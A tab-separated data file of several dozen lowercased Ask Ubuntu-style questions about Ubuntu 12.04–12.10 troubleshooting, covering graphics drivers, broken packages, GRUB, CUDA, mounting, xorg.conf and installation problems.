271627	changing the color of the google search bar in the webpage	how can i change the background color in the google search bar of the webpage ? i changed my theme which uses a light grey text with a dark grey background but the webpage did n't change so it is a white background with a light grey text , very hard to read .
271628	stuck at installing ubuntu on samsung notebook 3	in my samsung notebook 3 , when installing ubuntu 12.10 using usb stick it got stuck at the ubuntu logo . i am sure my iso fine , first i tried ubuntu-12.10-desktop-i386 it got stuck now i have tried ubuntu-12.10-desktop-amd64 it also failed . laptop configuration : model : np305e5z cpu : amd a4 1.96ghz ram : 4gb please help me guys ... ..
271636	accidentally ran command , now do n't know what to do	accidentally ran command sudo chmod -r o+x /home on my ubuntu 12.10 . now what me to do ? is that dangerous ? i have no backup of partition , so i think this command is not reversible . so me to reinstall whole system because of this mistake ?
271637	messed up with mount and naming a partition - delete a folder in file system	i have a partition /dev/sda8 which i want to name it `` documents '' and automount . because i have a long time to use these commands , i messed up a little ( not that i am familiar ) . i used gparted and gave a label `` documents '' for the partition . then , i do n't remember exact the order of the commands i used , but sth like : sudo mount -l documents /dev/sda8 sudo mkdir /dev/sda8 sudo mkdir -p /dev/sda8 sudo mount /dev/sda8 /documents i added to fstab uuid=16b7ad55-aea9-49ed-8be9-0bbf1cb23c2e /documents ext4 # defaults 02 the result now is that i do n't have a device named 'documents' i have a folder named 'documents ' in my file system ( where /etc , /bin ... etc lies ) how can i correct these ? -- -- -- -- -- -update -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i tried to umount ( from the above commands ) and now i have the device `` documents '' but i still have a folder 'documents ' in file system which is empty and is 10gb ! how to delete that ? thanks !
271642	dvd wo n't load on laptop with ubuntu 12.04	i just installed ubuntu 12.04 on my compaq presario f700 laptop . when i insert a dvd into the drive , it spins and sounds like it 's trying to mount the disk , but nothing opens up . i had windows vista on this machine before installing ubuntu this morning , and it was having the same issue . is there a driver i need to install ? any help is appreciated . thanks !
271646	how to sniff mms urls from a lot of http links	i have a text file that contains the http urls for certain mp3 audio . if i copy and paste the link to browser , the browser is going to return me a mms link that i can use to download the streaming file . but i have to copy and past each http urls in order to sniff out the mms link . could you please tell me if there is a way to convert all these http urls ( a few hundreds ) into mms urls ?
271647	package requirements ( x11 ) were not met ( set the environment variables )	so today i went to install mesa - 9.0.1 from 01.org but was n't sure how to compile it so i found a site that said you could convert the contents of .tar.gz files into .debs by using alien . so i converted it and went to install it . it appeared to install fine but it was n't installed and when i later went to the package manager it says the package catalogue is broken and needs to be repaired . but it wo n't repair . dpkg : error processing /var/cache/apt/archives/libglapi-mesa_9.0.1-0ubuntu1~precise7.3_amd64.deb ( -- unpack ) : './usr/share/doc/libglapi-mesa/changelog.debian.gz ' is different from the same file on the system dpkg-deb ( subprocess ) : subprocess data was killed by signal ( broken pipe ) dpkg-deb : error : subprocess < decompress > returned error exit status 2 unpacking libgl1-mesa-glx ( from ... /libgl1-mesa-glx_9.0.1-0ubuntu1~precise7.3_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libgl1-mesa-glx_9.0.1-0ubuntu1~precise7.3_amd64.deb ( -- unpack ) : './usr/share/doc/libgl1-mesa-glx/changelog.debian.gz ' is different from the same file on the system dpkg-deb ( subprocess ) : subprocess data was killed by signal ( broken pipe ) dpkg-deb : error : subprocess < decompress > returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/libglapi-mesa_9.0.1-0ubuntu1~precise7.3_amd64.deb /var/cache/apt/archives/libgl1-mesa-glx_9.0.1-0ubuntu1~precise7.3_amd64.deb error in function : so i go in the synaptic package manager where it tells me i have 22 packages broken on my system . they 're all dependant of libgl1-mesa-glx and libglapi-mesa . so i go to reinstall it/them repair it/ whatever but it does n't work 'cause the package manager wo n't let me install anything 'cause these two files are dependant on the others as well . tried : sudo apt-get -f install sudo dpkg -- configure -a sudo apt-get purge libgl1-mesa-glx libglapi-mesa sudo apt-get -f autoremove sudo apt-get remove libgl1-mesa-glx libglapi-mesa sudo apt-get clean etc . following advice from other sites with no luck . so i go to compile the original mesa - 9.0.1 folder and run ./configure , what i should have done in the first place , and it tells me of other dependencies which i install but now it tells me i do n't have x11 but i 'm pretty sure i must do : checking for x11 ... no configure : error : package requirements ( x11 ) were not met : no package 'x11 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables x11_cflags and x11_libs to avoid the need to call pkg-config . please could you tell me how `` set the environment variables x11_cflags and x11_libs to avoid the need to call pkg-config . '' ?
271648	not able to run `` phablet-flash -b -l '' and so install ubuntu touch on my galaxy nexus	android debug bridge version 1.0.31 sdk updated . someone tell to change adb secure line from 1 to 0. if this is the solution , please tell me how to do it ! android version 4.2.2 many thanks !
271649	how to get back to windows after install ubuntu in the same partition ?	i have two partition on my system . on one partition , i keep my data , and on other i install my os . by mistake , i installed ubuntu 12.10 on the drive i had installed windows . now i need to get back to windows , but i do n't want to loose my data . is there any method by which i can do that without using another hard drive ?
271655	how to install texmaker 4.0.1 ( released a few days ago ) ?	i 'm new to latex , but want to get started for real ; settled for texmaker ; now checked the version ( and changelog ) and noticed a discrepancy between what i 've got installed ( 3.4 ) and what 's been released ( 4.0.1 ) -- just a few days ago . i found an outdated ppa , but nothing else so far . so far , i 've either installed things through ubuntu or via a ppa ; but hardly ever downloaded from a dev website , let alone compiled stuff from source . so my question ( s ) : anyone know of a ppa or ubuntu-official way of upgrading to the latest release of texmaker ? any reasons i should not go ahead and simply download ubuntu 12.04 i386 package : texmaker_ubuntu_12.04_4.0.1_i386.deb ( qt4 ) ? i 'm sure this has ( generically ) been asked before , plz mark as duplicate ( if deemed so ) , or provide a link to a good discussion/explanation on `` what to do a with a deb-file '' ... i.e. , how does it differ from directly installing sth through ubuntu-software-center ; what needs to be considered / taken care of / maintained ; why should one ( generally ) avoid a `` manual '' deb-installation ( especially if one does trust the source ) ? many thanks !
271656	virtualbox ubuntu 1204 guest - guest additions installed , but graphics driver unknown	i have an ubuntu 12.04 lts guest in vbox inside my native windows 7 . the graphics suddenly `` stop drawing '' or something , it stops updating the screen . i have tried adjusting the video memory ( from 128mb to 64 mb and back ) , adjusting the ram ( it has 2048mb , before it was 1024mb ) and tried running on the alternate chipset ich9 . i noticed that inside ubuntu , in the system settings- > details , it says that the graphics driver is unknown , and the experience is standard . the guest additions are installed , but still . is this normal ? alternatively , what else can be wrong if this is not the issue ? update : i have now disabled the 3d acceleration . if someone knows how to solve this , please provide an answer , i will be super happy .
271659	how do i recover deleted entries from xubuntu settings manager ?	while playing with the `` edit menu '' ( application menu ) , i deleted some entries for settings ( like `` display '' , `` appearance '' , `` desktop '' etc. ) . this also deleted the entries in the settings manager . how can i put them back ? xubuntu 12.10 - xfce 4.12
271662	the package system is broken using 12.04.2 lts	when i run the update manager i get this `` the following packages have unmet dependencies : libefl-bin : depends : libefl ( = 201212281219-551~precise1 ) but 201303222352-21556~precise1 is installed '' but when i do sudo apt-get install -f in the terminal i get the same output ?
271663	can i develop applications for the ubuntu software center using kde ?	i am interested in making an application to sell in the ubuntu software center . can i do this using the kde frameworks and c++ or any other kde-compatible language instead of gtk and python ? i am not interested in making a kde/kubuntu-specific application , just an application to be used on ubuntu/kubuntu written using the kde frameworks . if this is allowed , is there any major reason why i should choose gtk and python over kde and c++ ?
271677	how to import outlook express mails into thunderbird mail client ?	we are in the process of converting all our windows systems into ubuntu . is there a way to import outlook express mails into thunderbird in ubuntu ?
271683	unresolvable ( ! ) dependecy problems installing skype on ubuntu 12.04	i 'm having trouble installing skype on a new 12.04 install ( 64 bit ) . below are the results of three different attempts and the outputs . any help will be greatly appreciated ! 1.download skype .deb file from skype website , i chose ubuntu 12.04 ( multiarch ) . open the deb file with ubuntu software center and i get : error : can not install 'libasound2 : i386' 2.synaptic package manager : i mark skype for installation ( and the dialogue box for additional changes lists a ridiculously long list of packages to be removed ! but anyway ) i click ok , and get an error : could not mark all packages for installation or upgrade : the following packages have unresolvable dependencies . make sure that all required repositories are added and enabled in the preferences . skype : depends : skype-bin 3.tried the instructions from help.ubuntu but i get $ sudo dpkg -- add-architecture i386 dpkg : error : unknown option -- add-architecture but one way or another i think i sorted this out , so : $ dpkg -- print-foreign-architectures i386 this is what my sources.list looks like : deb http : //archive.ubuntu.com/ubuntu precise main universe restricted multiverse deb-src http : //archive.ubuntu.com/ubuntu precise main universe restricted multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu/ precise-security main universe restricted multiverse deb-src http : //security.ubuntu.com/ubuntu/ precise-security main universe restricted multiverse # added by software-properties deb http : //cran.r-mirror.de/bin/linux/ubuntu precise/ deb http : //archive.canonical.com/ precise partner deb-src http : //archive.canonical.com/ precise partner i then run sudo apt-get update and sudo apt-get upgrade and finally : $ sudo apt-get install skype : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : default-jre-headless : depends : openjdk-6-jre-headless ( > = 6b23~pre11-1ubuntu1~ ) libatk-wrapper-java : depends : default-jre or java2-runtime recommends : libatk-wrapper-java-jni but it is not going to be installed skype : depends : skype-bin e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i then try also : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i 've also done clean , autoclean , dist-upgrade with no obvious effect.not sure where to go from here ! ?
271684	( qml ) scroll multiple listviews	is possible to scroll multiple listviews together in qml ? ? this was my attempt : flickable { id : scoreflick anchors.top : namesrow.bottom anchors.left : parent.left anchors.right : parent.right anchors.leftmargin : units.gu ( 2 ) anchors.topmargin : units.gu ( 2 ) row { spacing : namesrow.spacing listview { id : p1list width : units.gu ( 9 ) height : units.gu ( 20 ) model : 30 delegate : textfield { width : listview.view.width height : units.gu ( 3 ) text : `` score '' } } listview { id : p2list width : units.gu ( 9 ) height : units.gu ( 20 ) model : 30 delegate : textfield { width : listview.view.width height : units.gu ( 3 ) text : `` score '' } } listview { id : p3list width : units.gu ( 9 ) height : units.gu ( 20 ) model : 30 delegate : textfield { width : listview.view.width height : units.gu ( 3 ) text : `` score '' } } listview { id : p4list width : units.gu ( 9 ) height : units.gu ( 20 ) model : 30 delegate : textfield { width : listview.view.width height : units.gu ( 3 ) text : `` score '' } } } } scrollbar { flickableitem : scoreflick align : qt.aligntrailing } but each listview scroll by itself and the scrollbar does not work at all ... any help ?
271685	12.04.2 lts server failure during installation during `` detecting network hardware ... ''	i 've got an older pc , inherited from my father , who had it running winxp successfully . i 've tried unsuccessfully for 2 days to install ubuntu server v 12.04.2 lts as a replacement ( ie , no dual-boot ) o/s . pc is using a asus psgc-mx/1333 mobo , with ami bios v 0405 , with an integrated 10/100 mb ethernet i/f . the processor is pentium e5200 operating at 2.5ghz , and there are 2 gb ram . hard disk is seagate barracuda , 250gb . cd device is a pioneer dvd-rw . there is also a asus pci-g31 wireless nic installed . i 've tried to load both 32- and 64-bit versions of the i386 iso image , on a cd burned from my imac . i validated the cd using the install routine ( `` check disk for defects '' selection ) and it came up clean and readable . the failure mode was identical for both versions : the install process went south when it was detecting network hardware ... and then ... nothing i see power and activity lights on the lan port on the motherboard ( i am not trying to use the wireless nic , as i understand it will need to be configured separately later ) . the router is an apple airport extreme with dhcp enabled , and i am connected through a hardwire ethernet port . the lan cable is a `` known-good '' version . i ca n't figure out where to go next , as i 'm not sure how to check the lan config on the mobo to ensure it is supported by the install process . any and all suggestions welcome ! regards , dean
271696	secondary storage not properly mounted	not all of my secondary discs partitions are visible.when i open it from gparted it shows ntfs signature missing.is there any way to fix this without lossing any data ? ? this drive ( secondary ) has 4 partitions.only 2 of them show up in file explorer. ! [ enter image description here ] [ 1 ]
271701	how to directly open the desktop in a live ubuntu image ?	i put ubuntu on a usb stick using linuxliveusb it works great , but upon start-up a dialog box for installing ubuntu comes up asking if one wants to install it or to just continue to use it . it stops the start-up process , and if you click it closed it then shows you the desktop . can anyone advise me how to just boot straight into the desktop by getting rid of this dialog box ? this is definitely after the start-up , so i think it must be in an init.d script someplace .
271702	qqmlcomponent : component is not ready	i 'm following through the create a currency converter app tutorial . i 'm on a fresh raring install and have installed the ubuntu-sdk . i created a new project ( qt quick 2 ui ) and copied in the currencyconverter.qml text . but when i use ctrl-r to run qmlscene i get the error 'qqmlcomponent : component is not ready ' , qmlscene seems to run fine but the currency converter title text is missing . any help appreciated .
271706	my mouse does not click between windows , i can still move it .	i installed ubuntu 12.04 on my desktop and it installed fine and everything was working . then when i clicked on the settings icon in the unity launcher my mouse would not click on any of the settings icons . i could open other applications but likewise i could not do anything inside the application . if i unplug the mouse and plug it back in i can use the currently open application but no others . help would be greatly appreciated .
271707	software center seems to freeze system when installing , syslog has `` blocked for more than 120 seconds '' errors	12.04 ( precise ) 64-bit kernel linux 3.2.0-39 3.6gb memory intel core 2 duo cpu @ 2.40ghz x2 wubi-installed ubuntu running on a macbook pro 7.1 with osx running vista via boot camp ( hey , i like lots of os 's m'kay ? ) when installing from ubuntu software center my system very frequently freezes . this has happened 4 of the last 5 installs . most recently i was installing the google earth .deb from google 's website : clicking the .deb file automatically opens software center ( otherwise i would have used synaptic , as i 've grown to expect software center to freeze my system and i 'm rather tired of it . ) by `` freeze '' i mean nothing works : no dash , no launcher , no mouse movement , no alt-tab , ca n't open terminal ( keyboard does not work ) . software center does show the `` installing '' icon but after that it greys out and i ca n't click anything . reisub has no effect but a cold power-down and restart is possible . occasionally , after 5-10 minutes , i 'll be able to move the mouse / use the keyboard and run a launcher command or two , although other open apps ( chrome and software center ) will still be greyed-out/frozen . ( i 've never waited longer than that - if still unresponsive after 15 minutes i just power down and restart . ) most recently , which is why i am finally posting a question , i waited about 15 minutes and was finally able to open system monitor while this was going on . processes tells me that system monitor is using about 20 % of cpu , and nothing else is using much ( zeros mostly ) . in fact i did n't even see software center listed ? however at this point the system finally partially unfroze , the installation completed , and while i was n't about to close software center i was able to do a system shutdown and fresh restart and i went and took a look at the syslog . in /var/log/syslog i see a lot of `` : blocked for more than 120 seconds '' messages . similar to ubuntu hang out with this message : blocked for more than 120 seconds which has not been answered , and i 'm not running a virtual machine . my full syslog with stack traces looks very , very similar to this : why do tasks on amazon xen instance block for over 120 seconds causing server to hang ? note that that question was solved , but that 's because the problem was being caused by amazon and amazon fixed the bug . i 'm not running anything amazon-related . my syslog does look very similar , however . my question is also similar to this : troubleshooting server hang but the referenced `` duplicate '' in that question is about how to kill processes/restart when the system freezes . i know how to kill processes and restart . i want to figure out what is causing the problem so i can try to fix it . i realize that i could just use synaptic instead of ubuntu software center , but i 'd like to try to solve the problem if possible . i 'm thinking i should perhaps submit a bug report , but i wanted to first see if anyone else was having any similar problems , and if so what you all did to fix it . i see a number of questions about software center freezing and others , including those i linked , about the `` blocked for more than 120 seconds '' log error , but i did n't see any question that links the two . i did save a copy of the syslog report if anyone wants to see it , but as mentioned it 's quite similar to the one posted in the amazon-related question ... and i did n't want to take up even more space unnecessarily as , my apologies - this question has already become extremely verbose !
271708	ubuntu desktop 12.10 and ati radeon hd 3400	have i just started using ubuntu so sorry if my question seems stupid . i installed ubuntu 12.10 and everything works fine on my laptop except the loud noise and heat problem . now i asked around and everyone suggested that one of my drivers is not properly set so i checked and found out that under graphics i have driver = unknown . now i tried to look around for a driver to radeon hd 3400 and found one in amd website downloaded installed then rebooted . my screen went really large and i could n't see the icons bar to the left . after a 5 hours trying to fix it i purged ( delete ? ) the driver and ubuntu started working but still driver unknown . any idea what i have to do to fix this please ? thanks .
271709	is ubuntu really this much slower than windows ?	i installed ubuntu on my acer aspire one ( 2 gig memory , 113g disk available ) from the www.ubuntu.com site using the windows installer option . it is even slower than windows . i could make a sandwich in the time it takes to just open up firefox , and libre office is no better . i thought that ubuntu is supposed to be a nice fast lightweight operating system . what gives ?
271715	how can i get my nvidia overscan setting to work on start up . ubuntu 12.10	hi all as with a lot of people my new nvidia driver does n't include a overscan bar so my tv 's desktop is chopped off . after many searches and some trail and error i 've been able to get my tv to fit the desktop onto my screen using this command nvidia-settings -- assign 0/currentmetamode= '' dfp-1 : 1920x1080 { viewportin=1920x1080 , viewportout=1820x1020+45+30 } '' but i ca n't seem to figure out a way to get that to happen on start-up . i 've tried going to terminal and using gedit ~/.nvidia-settings-rc and adding 0/currentmetamode= '' dfp-1 : 1920x1080 { viewportin=1920x1080 , viewportout=1820x1020+45+30 } '' to the end but that seems to not help . is there maybe something else i can do or am i missing something ? any help is appreciated . at the moment i 'm just copying and pasting the command after my pc boots into the terminal and it works but i feel there has to be a better way . thanks again
271718	linux machine not visible to pc or macs at home	setup linux 12.10 machine from scratch , it can connect to the internet no problem . however i can not see the linux machine from my pc or mac , is there something else i need to do ?
271719	vmware view install	vmware.com at https : //my.vmware.com/web/vmware/details ? downloadgroup=viewclients_linux32_170 & productid=331 & rpid=3638 # product_downloads states : '' to download the vmware horizon view client from the ubuntu software center , configure ubuntu software center to allow software packaged by canonical for their partners . next , open a web browser in ubuntu and click on the download link . '' how does one accomplish that ? ( step-by-step ) when i use ubuntu software center , the version from vmware isnot found and the version there is too old for use at my institution .
271723	how do i get my virtualbox to load into the system i already installed ?	i am trying to install ubuntu on virtualbox on my mac os x. i got through the whole installation process with out any problems . but , when it asked to restart the computer and it rebooted , it keeps asking to start the installation . at first , i thought this meant that the installation did n't work , but when while i began re-installing it asked if i wanted to install the new system alongside the old ubuntu system that i had just installed . how do i get my virtualbox to load into the system i already installed ? it just seems to only allow me to install again , but nothing else .
271724	xorg.conf for vga connection with sony bravia at lucid lynx	here is my current xorg.conf file contents : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce4 mx 4000 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' endsection indeed , there is a geforce4 mx 4000 from nvidia installed , and the nvidia configuration software works fine . here is the full case : i was using another monitor , and everything was fine . then , i switched from it to the sony bravia tv ( model kdl-32ex405 ) . the previous xorg.conf simply gave me a black screen , so i backed it up and i had to make this minimal xorg.conf file , so i was able to use it on its current 640 x 480 resolution i am now . it is kind of funny : a very big screen with a very small resolution ... anyway , i am no x server expert , so i need to know what to type into xorg.conf so i can use a better resolution . remember : no hdmi available , only vga cable . thank you !
271729	how to set grub install device non-interactively	i 'm writing a bash script that runs on a fresh install of ubuntu 12.04 and installs a bunch of packages non-interactively . the problem is that grub reports the following error when i run apt-get upgrade ( or many of the subsequent install commands ) : '' the grub boot loader was previously installed to a disk that is no longer present or whose normally unique indentifier was changed for some reason . it is important to make sure that the installed grub stays in sync with other components such as the grub-cfg or with newer linux images it will have to load , and so you should check again , to make sure that grub is installed to the appropriate boot devices . '' i believe this is happening because i 'm running in a vm , but it seems like it should be an easy fix . i know that i want to use /dev/sda , but i do n't want to pick it interactively , i want to just set it via the command line . i believe that the comment on this answer is what i want to do ( the debconf bit ) , but i do n't know anything about debconf and searching has n't helped . as the comment implies , the suggestion in the answer does not 'save ' the install device in whatever configuration file is checked when updating . how to solve this ?
271740	problem with creating a bootable usb stick on os x ?	i have followed the guide from http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx and then at step 8 , which is `` execute sudo dd if=/path/to/downloaded.img of=/dev/rdiskn bs=1m '' , i get a problem , it says : `` dd : /downloads/ubuntu.dmg : no such file or directory '' . i have checked , it should be there . help needed , thanks : )
271742	cuda 4.2 on ubuntu 12.04	i 'm new to linux and ubuntu . i 'm trying to install cuda 4.2 on ubuntu 12.04 . i 'm following the instructions found here : https : //help.ubuntu.com/community/cuda has anyone been able to get cuda installed using those instructions ? the errors i get happen when i try the compilation of the sdk . this is what i get : smaragh @ ubuntu69 : ~/nvidia_gpu_computing_sdk/c $ linkflags=-l/usr/lib/nvidia-current-updates/ make cuda-install=/opt/cuda make [ 1 ] : entering directory `/home/smaragh/nvidia_gpu_computing_sdk/c/common' cc1plus : warning : command line option â-wimplicitâ is valid for c/objc but not for c++ [ enabled by default ] in file included from src/bank_checker.cpp:15:0 : ./../common/inc/bank_checker.h:34:41 : warning : type qualifiers ignored on function return type [ -wignored-qualifiers ] ./../common/inc/bank_checker.h:220:39 : warning : type qualifiers ignored on function return type [ -wignored-qualifiers ] src/bank_checker.cpp:57:24 : warning : type qualifiers ignored on function return type [ -wignored-qualifiers ] src/bank_checker.cpp:259:12 : warning : type qualifiers ignored on function return type [ -wignored-qualifiers ] assembler messages : fatal error : ca n't create obj/x86_64/release/bank_checker.cpp.o : permission denied make [ 1 ] : *** [ obj/x86_64/release/bank_checker.cpp.o ] error 1 make [ 1 ] : leaving directory `/home/smaragh/nvidia_gpu_computing_sdk/c/common' make : *** [ lib/libcutil.so ] error 2 any help would be greatly appreciated . thank you .
271746	hotkeys not working ( megaware black purple laptop )	when i type fn + ( f9 , f10 , f11 or f12 ) , they do n't do their functions ( touch pad lock , sound on/off , decrease sound , increase sound ) . what do i need to do to fix this ? -- i 'm using ubuntu 12.10 on my notebook ( black purple of megaware )
271751	which version of python do i have installed ?	i 'm trying to write a simple python script using geany . this ide will automatically compile the code i write but i 'm not sure which version of python it is using . if i enter python -- version in the command line i get : python 2.7.3 but if i enter python3 i get : python 3.2.3 ( default , oct 19 2012 , 19:53:16 ) [ gcc 4.7.2 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > does ubuntu come with both versions ? if so , which one is geany using to compile ?
271755	how do i automatically set my touchpad to turn off when an external mouse is used ?	i need a way to automaticallay turn the touchpad off when an external pointing device is in use . i tried setting `` turn off touchpad while typing '' in system settings , but that did n't work . a slight caveat is that i use both bluetooth and usb pointing devices , so perferably a solution would be able to detect both of these . i really do n't want to have to use commands or a script to accomplish this . i have tried the two touchpad apps in the software center , but neither of these had a setting for this . thanks in advance . well ... i had mentioned in my original post that i tried the app called `` synaptiks '' which i found on the ubuntu software center , but apparently someone re-wrote my whole original post and left out that ( and other ) important details ... i installed the `` synaptiks '' app , and it did work , but i discovered that a bunch of other apps had been installed without my knowledge or consent when i installed synaptiks . i felt that this was wrong and seemed like a potential security breech on my machine so i tried to remove these other apps individually and found that trying to remove one ended up removing them all , including the touch pad app ... seems really suspicious to me so i made sure all of it was removed ... at least i hope ... no telling what else it could have installed on my laptop without my knowledge . and to the asshat who deleted half of my original post ... thanks for making me have to waste my time to retype all of this to explain it all over again ... and for wasting the time of the person who replied telling me to use the synaptiks app ... if you had not edited my original post it would have saved us all the trouble .
271757	how to make realtek 8723 recognize the network ?	i have a toshiba satellite s855-s5378 , and the wireless card does n't work in ubuntu 12.10 64-bit . this is my kernel : linux 3.5.0-26-generic # 42-ubuntu smp fri mar 8 23:18:20 utc 2013 x86_64 x86_64 x86_64 gnu/linux this is my wireless card : *-network descripción : interfaz inalámbrica producto : realtek semiconductor co. , ltd. [ 10ec:8723 ] fabricante : realtek semiconductor co. , ltd. [ 10ec ] id físico : 0 información del bus : pci @ 0000:02:00.0 nombre lógico : wlan0 versión : 00 serie : 20:68:9d:40:68:20 anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress bus_master cap_list ethernet physical wireless configuración : broadcast=yes driver=rtl8723e driverversion=3.5.0-26-generic firmware=n/a ip=192.168.1.104 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn recursos : irq:17 ioport:2000 ( size=256 ) memoria : c8400000-c8403fff i followed the steps in the following question : wireless card realtek rtl8723ae-bt is not recognized and sucessfully installed the driver from the location . but sometimes the wireless does n't recognize any network . it´s really rare . when i reboot the notebook , the wireless do n't work . i try to use modprobe to load the module but without any success . but , when i shut down the pc , and then when it starts , the wireless works fine . how do i solve this problem ?
271761	looking for a better solution to execute a single sudo command when using a normal user account ?	i 'm logged in with a normal user account that is n't member of the groups sudo and admin . when i run the following example command.. su -c 'sudo some_command_that_needs_sudo ' sudo-user ..it 's necessary to enter the password twice . the first time to login as sudo-user and the second time because we request root privileges using sudo . do you know how to prevent entering the password a second time ? please keep in mind.. ..do n't want to change any user privileges ..want to enter password just once ..looking for a simple single command
271763	apt-get update error	i am running into this message whenever i try to do sudo apt-get update ... get:1 http : //security.ubuntu.com precise-security release.gpg get:2 http : //archive.canonical.com precise release.gpg get:3 http : //security.ubuntu.com hardy-security release.gpg get:4 http : //archive.canonical.com precise release get:5 http : //us.archive.ubuntu.com precise release.gpg get:6 http : //us.archive.ubuntu.com precise-updates release.gpg get:7 http : //us.archive.ubuntu.com precise-backports release.gpg get:8 http : //security.ubuntu.com precise-security release get:9 http : //us.archive.ubuntu.com precise release get:10 http : //security.ubuntu.com hardy-security release get:11 http : //us.archive.ubuntu.com precise-updates release get:12 http : //us.archive.ubuntu.com precise-backports release ign http : //archive.canonical.com precise release e : gpg error : http : //archive.canonical.com precise release : the following signatures were invalid : nodata 1 nodata 2 i am running ubuntu 12.04 behind my university proxy . can anyone help ?
271764	ubuntu 12.04 - bumblebee 3.1 - error - unable to locate package bumblebee	hello ubuntu citizens , i am on ubuntu 12.04 lts ( up-to-date ) and was trying to install the new bumblebee 3.1 first , i tried to remove bumblebee first using : sudo apt-get install ppa-purge sudo ppa-purge ppa : bumblebee/stable then i re-install using : sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia linux-headers-generic the last command gave me error : ux-headers-generic reading package lists ... done building dependency tree reading state information ... done e : unable to locate package bumblebee e : unable to locate package bumblebee-nvidia what did i do wrong ? i looked around for a couple hours but got nothing . can anyone help me out please ?
271767	limitations when computing on cuda gpu , ubuntu shut down	i have created project in c++ for cuda gpu . it runs ok , i tried for 1 000 000 paths for 512 european options , then i increased the number so loop took longer and longer ( but still few seconds ) , but when i turned loop to really huge number program started , but during computation my ubuntu 12.10 started to turn off . i turned off my comp manually , because i do n't want my gpu tu burn off or something similar . i have 4 cores amd 64 , 8 gb ram . may it be that gpu started to require too much power than possible and system decided to shut down ? it was not a stack overflow , also i have seen ram on machine was n't involved . do i have limitations when using cuda ? can i have broken it ? now i do computation on gpu again but the question remains : what are limitations , do i have to be careful about something ?
271776	how to resize an image through the terminal ?	i have ubuntu 10.04 . i have converted image through terminal using the following command : convert myfigure.png myfigure.jpg . but i want to resize the height and width of the converted image . is there any way to do this ?
271777	ubuntu 12.10 startup error	after i installed ubuntu 12.10 on windows 8 using wubi.exe and when it rebooted i got an error and i can still only boot with windows 8 but i still have the option of starting up with ubuntu but if i do i just get the same error . and it has 3 solutions , i forgot what they were but one was something like `` click repair your computer '' . please help .
271778	what format is used in the lxc config file to specify control group settings ?	i want to limit the cpu shares of available to two lxc containers running . it appears that this is done by adding the control group definitions into the lxc config file . but what 's the format ? the ubuntu server docs stop short of explaining how to do this . specifically i 'd like to do this : container a is guaranteed 80 % cpu as needed , container b 20 % basically the same block i/o access guarantees as we have for cpu above
271779	help fixing graphics card driver ?	so i managed to fairly severely mess up my graphics card driver . i was trying to install opencl using instructions from here : http : //orbigo.net/2012/07/installing-nvidia-opencl-cuda-sdk-in-ubuntu-12-04-lts/ i dropped down to a shell using ctrl+alt+f1 , and stopped the lightdm service . then i ran the file from nvidia . for some reason i thought it would be a good idea to install the driver that came with the package . when i tried to restart lightdm after this , my system showed the ubuntu splash screen and then froze up with a black screen with a blinking cursor . i then tried to reboot my computer , but it seems to lock up while starting up . i get the ubuntu splash screen , but then i get a black screen listing a bunch of services that have been started . the last service on this list is lightdm , which it says started ok , but it seems to freeze after that . i believe ubuntu has some sort of recovery option on the grub menu , so i tried loading into that . the problem here is that i ca n't seem to get into the grub menu . it appears to be the same issue as this : grub menu does n't appear when pressing shift i booted up using a livecd with ubuntu 12.04 on it , and tried fixing the grub as per the answer i linked . unfortunately because i 'm running off a livecd , it does n't seem to like the update-grup step , since the boot table is different or something like that ... i get the error : error : can not find a device for / ( is /dev mounted ? ) . when i try this . i also tried grub-install /dev/sda but i seem to get the same error here . i 'm running ubuntu 12.10 . i forget exactly what graphics card i have , but it 's an older ( ~6 years or so ? ) nvidia one . there are n't any other os 's installed on my machine . any help to get my computer back into a usable state without having to reinstall the os would be appreciated . update : i have managed to fix grub using the boot-repair tool , and can get into recovery mode . now i just have to figure out how to fix my graphics card driver from here . the root terminal option is working .
271798	ssd tweaks for ubuntu 12.04 cause texmaker to compile a lot slower	i added these tweaks from ubuntu ssd tweak and ubuntu tweaks but now texmaker is compiling slowly . does someone know what tweak would be causing this ? or could i edit something unrelated to the tweaks to get texmaker to compile as it did previously ? 2nd gen intel i5 , 16gb cosair ram , 240gb cosair force series gt , ntfs , quick build latex to pdf
271801	configure modeline ubuntu 12.04	i am running ubuntu 12.04.2 in dual boot with windows 7 on the same drive . in windows , i customize my refresh rate for my 2nd monitor with the program powerstrip . when i export my linux modeline and create a new mode for ubuntu , i get the following errors when i try to change my 2nd monitor to that mode : ~ $ xrandr -- output dfp3 -- mode `` 1400x1050_2 '' xrandr : configure crtc 1 failed my question is , how can i remedy this problem ? i need to have the same custom timings as wndows . my specs are : ubuntu 12.04.2 ( 3.5.0-23-generic ) amd driver catalyst-13.1-linux-x86.x86_64 p6x58d premium motherboard 6 gigs of ram 23 inch asus monitor 15 inch diy monitor .
